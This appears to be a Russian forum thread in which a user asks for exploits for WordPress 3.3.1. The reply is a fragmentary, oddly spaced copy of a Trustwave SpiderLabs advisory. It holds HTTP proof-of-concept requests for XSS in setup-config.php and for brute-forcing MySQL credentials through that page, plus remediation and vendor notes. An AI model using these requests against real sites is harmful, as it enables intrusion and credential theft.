Сообщение от
FaceLess
FaceLess said:
Есть что-нибудь на 3.3.1?
WordPress
[/COLOR]Note #1: Any php file in the theme could be used.
Note #2: Depending settings, PHP may be use d to execute system commands
on webserver.
Malicious user performs get request of modif ied page to execute code.
Request
-------
GET /wp-content/themes/default/404.php HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0 .1) Gecko/20100101 Firefox/8.0.1
4.) Get Persistent Cross Site Scripting
Malicious User Injects Malicious Javascript i nto their own MySQL database instance
MySQL Query
-----------
update wp_comments SET
comment_content='alert('123')' where comment_con tent='Hi,
this is a comment.
To delete \ a comment, just log in and vi ew the
post's comments. There you will have the op tion to edit or delete
them.';
Non-malicious User Visits Wordpress installation and has Javascript executed on their browser
Request
-------
GET /?p=1 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0 .1) Gecko/20100101 Firefox/8.0.1
Finding 2: Multiple Cross Site Scripting Vul nerabilities in
'setup-config.php' page
CVE: CVE-2012-0782
The WordPress 'setup-config.php' installation page allows users to install
WordPress in local or remote MySQL databases . When using this installation page
the user is asked to supply the database n ame, the server that the database
resides on, and a valid MySQL username and password.
During this process, malicious users can sup ply javascript within
the "dbname", "dbhost" or "uname" parameters. Upon clicking the submission
button, the javascript is rendered in the c lient's browser.
Proof of Concept:
Servers Involved
A.B.C.D = Target WordPress Web Server
Request
-------
POST /wp-admin/setup-config.php?step=2 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0 .1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
dbname=%3Cscript%3Ealert%28%27123%27%29%3C%2Fscrip t%3E&uname=root&pwd=&dbhost=localhost&prefix=wp_&s ubmit=Submit
Finding 3: MySQL Server Username/Password Disclosure Vulnerability via
'setup-config.php' page
CVE: CVE-2011-4898
The WordPress 'setup-config.php' installation page allows users to install
WordPress in local or remote MySQL databases . When using this installation page
the user is asked to supply the database n ame, the server the database resides
on, and a valid MySQL username and password .
Malicious users can omit the "dbname" parame ter during this process, allowing
them to continually bruteforce MySQL instance usernames and passwords. This
includes any local or remote MySQL instances which are accessible to the
target web server. This can also be used a s a method to proxy MySQL bruteforce
attacks against other MySQL instances outside of the target organization.
Proof of Concept:
Servers Involved
A.B.C.D = Target WordPress Web Server
L.M.N.O = Any MySQL Server for which the W eb Server has network access
Request
-------
POST /wp-admin/setup-config.php?step=2 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0 .1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
uname=mysql&pwd=mysql&dbhost=L.M.N.O
Response (If Password is Valid)
-------------------------------
We were able to connect to the database se rver (which means your username
and password is okay) but not able to sele ct the database.
Response (If Password is Invalid)
---------------------------------
This either means that the username and pas sword information in your
wp-config.php file is incorrect or we can't co ntact the database server at
localhost. This could mean your host's datab ase server is down.
Vendor Response:
Due to the fact that the component in ques tion is an installation script,
the vendor has stated that the attack surfa ce is too small to warrant
a fix:
"We give priority to a better user experien ce at the install process. It is
unlikely a user would go to the trouble of installing a copy of WordPress
and then not finishing the setup process mo re-or-less immediately. The
window of opportunity for exploiting such a vulnerability is very small."
However, Trustwave SpiderLabs urges caution i n situations where the
WordPress installation script is provided as part of a default image.
This is often done as a convenience on h osting providers, even in
cases where the client does not use the so ftware. It is a best practice
to ensure that no installation scripts are exposed to outsiders, and
these vulnerabilities reinforce the importance of this step.
Remediation Steps:
No official fix for these issues will be r eleased for the WordPress
publishing platform. However, administrators c an mitigate these issues by
creating strong MySQL passwords and defining rules within a web application
firewall (WAF) solution. ModSecurity (http://www.modsecurity.org/) has
added rules to the commercial rules feed fo r these issues, and Trustwave's
vulnerability scanning solution, TrustKeeper, has been updated to detect
exposed installation scripts.
Vendor Communication Timeline:
12/22/11 - Vulnerability disclosed
01/16/12 - Confirmation to release vulnerabilities
01/24/12 - Advisory published
References
1. http://www.wordpress.org
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industr y compliance management
solutions to businesses and government entiti es throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique appr oach with comprehensive
solutions that include its flagship TrustKeep er compliance management
software and other proprietary security solut ions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and larg e
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastru cture, data communications and
critical information assets. Trustwave is hea dquartered in Chicago with
offices throughout North America, South Ameri ca, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave's SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penet ration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetrat ion tests and hundreds of
application security tests globally. In addit ion, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave 's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims al l warranties, either express or
implied, including the warranties of merchant ability and fitness for a
particular purpose. In no event shall Trustw ave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or s pecial damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclu sion or limitation of liability
for consequential or incidental damages so t he foregoing limitation may not
apply.
This transmission may contain information tha t is privileged, confidential, and/or exempt from disclosure under applicable l aw. If you are not the intended recipient, you are hereby notified that any disclosure , copying, distribution, or use of the info rmation contained herein (including any relia nce thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in el ectronic or hard copy format.[/COLOR]
[/PHP]
Похожие темы
Линейный вид
